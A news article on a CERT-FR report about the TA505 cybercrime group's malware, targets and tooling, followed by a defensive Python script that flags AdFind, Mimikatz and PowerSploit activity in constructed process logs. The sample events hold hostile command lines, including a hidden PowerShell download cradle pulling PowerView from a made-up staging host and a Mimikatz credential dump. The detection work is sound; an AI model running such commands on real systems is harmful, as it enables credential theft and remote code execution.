From Dridex and Locky to Clop, the TA505 cybercriminal group has spread a long list of malware as dangerous as it is devastating. The French government centre for monitoring, alerting and responding to computer attacks (CERT-FR) has published a report tracing the evolution of the group's activity since 2014.
What do the Dridex and TrickBot trojans and the Locky and Clop ransomware families have in common? TA505. Behind this name is a group of cybercriminals, most likely of Russian origin, which has distinguished itself for years by running a flourishing series of cybercrime operations built on this malware. After examining the origins and uses of Dridex last May, CERT-FR has now turned to the development of TA505's activity.
“Often confused with the cybercriminal group Evil Corp (operator of the Dridex botnet and the BitPaymer ransomware), and sometimes considered the operator of the Necurs botnet, TA505 uses an evolving attack arsenal which it deploys in varied and sometimes simultaneous campaigns, which can lead to confusion about its motivations,” says CERT-FR. “As such, the links it presents with Lazarus and Silence suggest that TA505 runs campaigns on its own account and campaigns on behalf of its customers.”
A variety of targets and sectors
TA505 first made headlines in 2017, but according to CERT-FR the group's creation dates back to at least 2014. As for targets, no major sector has been spared its waves of attacks: the automotive industry (January 2018), the financial sector (October, November and December 2018), the hotel industry (December 2018 to March 2019), banks (June-July 2019), government agencies (July-August 2019), education (December 2019) and health and pharmaceuticals (January-March 2020).
The perfect hacker toolbox
Regarding TA505's modus operandi, CERT-FR reports that several first-stage loaders were tried out, including Quant Loader, Marap, Amadey and Andromut (aka Gelup). “The TA505 operating mode therefore does not seem to hesitate to set aside some of its attack codes to test others. Despite this, a trend emerges: it seems to use the first-stage malicious code Get2 on a more regular basis, the backdoor component of which is also called Friendspeak,” CERT-FR specifies. Among the second-stage malware used are FlawedAmmyy, tRat, RMS or RmansSys, ServHelper, FlawedGrace, FlowerPippi and SDBbot. To explore the compromised information system, the group moved laterally across the network, helped by the Cobalt Strike and TinyMet penetration-testing tools, and relied on PowerSploit and AdFind to map the environment. Mimikatz was used to collect credentials from compromised machines, and Locky and Clop provided the final malicious encryption.
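The post-exploitation tooling named above (AdFind, PowerSploit, Mimikatz) is noisy in process-creation telemetry, which is where a defender would first look for it. As an added example, not taken from the article or from the CERT-FR report, the following Python script scans a handful of constructed Windows process-creation events (hypothetical hosts and command lines, not real telemetry) for AdFind enumeration switches, Mimikatz module syntax, PowerSploit/PowerView names and PowerShell download cradles, and then singles out hosts where more than one tool family fired, since a single match is a weak signal on its own.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events for this example: (host, parent image, image, command line).
# None of this is real telemetry; hosts, paths and the 10.0.0.5 staging address are made up.
SAMPLE_EVENTS = [
    ("WS01", "explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ("WS01", "cmd.exe", r"C:\Users\Public\adfind.exe", "adfind.exe -f objectcategory=person -csv > users.csv"),
    ("WS01", "cmd.exe", r"C:\Users\Public\adfind.exe", "adfind.exe -sc trustdmp"),
    ("SRV02", "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerView.ps1'); Get-NetComputer"),
    ("SRV02", "cmd.exe", r"C:\Windows\Temp\m.exe", "m.exe privilege::debug sekurlsa::logonpasswords exit"),
    ("SRV02", "services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

# Rule families keyed on command-line content rather than binary names, because the
# binaries are routinely renamed (the "m.exe" Mimikatz copy above is a typical case).
RULES = [
    # AdFind switches commonly used for AD reconnaissance: user listing, trust dump, subnets, GC bind
    ("adfind_ad_enumeration",
     re.compile(r"\badfind(\.exe)?\b.*(-f\s+objectcategory=|-sc\s+trustdmp|-subnets|-gcb)", re.I)),
    # Mimikatz module::command syntax survives renaming of the executable
    ("mimikatz_credential_dump", re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
    # Well-known PowerSploit / PowerView function and script names
    ("powersploit_module",
     re.compile(r"\b(Invoke-Mimikatz|Invoke-Kerberoast|PowerView\.ps1|Get-NetComputer|Get-NetUser|Invoke-Shellcode)\b", re.I)),
    # In-memory download-and-execute cradle typically used to load PowerSploit without touching disk
    ("powershell_download_cradle",
     re.compile(r"IEX\s*\(?\s*New-Object\s+Net\.WebClient\)?\.DownloadString", re.I)),
]


@dataclass
class Hit:
    host: str
    rule: str
    command_line: str


def scan_events(events):
    """Return one Hit per (event, rule) pair whose command line matches the rule."""
    hits = []
    for host, _parent, _image, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append(Hit(host, name, cmdline))
    return hits


def hosts_with_multi_tool_activity(hits, min_distinct_rules=2):
    """Hosts on which at least `min_distinct_rules` different rule families fired.

    Correlating across families (e.g. AD enumeration plus credential dumping on the
    same host) is a far stronger lateral-movement signal than any single match.
    """
    rules_by_host = {}
    for hit in hits:
        rules_by_host.setdefault(hit.host, set()).add(hit.rule)
    return sorted(host for host, rules in rules_by_host.items() if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for h in found:
        print(f"{h.host:6} {h.rule:28} {h.command_line}")
    print("hosts to triage first:", hosts_with_multi_tool_activity(found))
```

On the constructed events, WS01 only triggers the AdFind family, while SRV02 triggers PowerSploit, a download cradle and Mimikatz, so SRV02 is the host to triage first. Cobalt Strike beacons and the TinyMet stager are not covered by these command-line patterns; they need network or memory-based detection instead.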